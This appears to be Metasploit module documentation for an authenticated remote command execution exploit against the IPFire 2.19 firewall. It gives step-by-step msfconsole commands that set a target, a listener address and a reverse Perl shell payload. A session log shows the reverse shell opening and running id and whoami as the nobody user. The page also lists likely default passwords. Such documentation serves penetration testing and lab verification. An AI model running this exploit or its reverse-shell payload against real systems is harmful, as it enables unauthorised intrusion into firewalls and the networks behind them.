2016-05-30 10:24:17 -04:00

## Vulnerable Application

Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core100/ipfire-2.19.x86_64-full-core100.iso)

Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

## Verification Steps

1. Install the firewall
2. Start msfconsole
3. Do: ```use exploit/linux/http/ipfire_proxy_exec```
4. Do: ```set password admin``` or whatever it was set to at install
5. Do: ```set rhost 10.10.10.10```
6. Do: ```set payload cmd/unix/reverse_perl```
7. Do: ```set lhost 192.168.2.229```
8. Do: ```exploit```
9. You should get a shell.

## Options

**PASSWORD**

Password is set at install. May be blank, 'admin', or 'ipfire'.

## Scenarios

```
msf > use exploit/linux/http/ipfire_proxy_exec
msf exploit(ipfire_proxy_rce) > set password admin
password => admin
msf exploit(ipfire_proxy_rce) > set rhost 192.168.2.201
rhost => 192.168.2.201
msf exploit(ipfire_proxy_rce) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(ipfire_proxy_rce) > set verbose true
verbose => true
msf exploit(ipfire_proxy_rce) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(ipfire_proxy_rce) > exploit

[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.201:49997) at 2016-05-30 10:09:39 -0400

id
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
whoami
nobody
```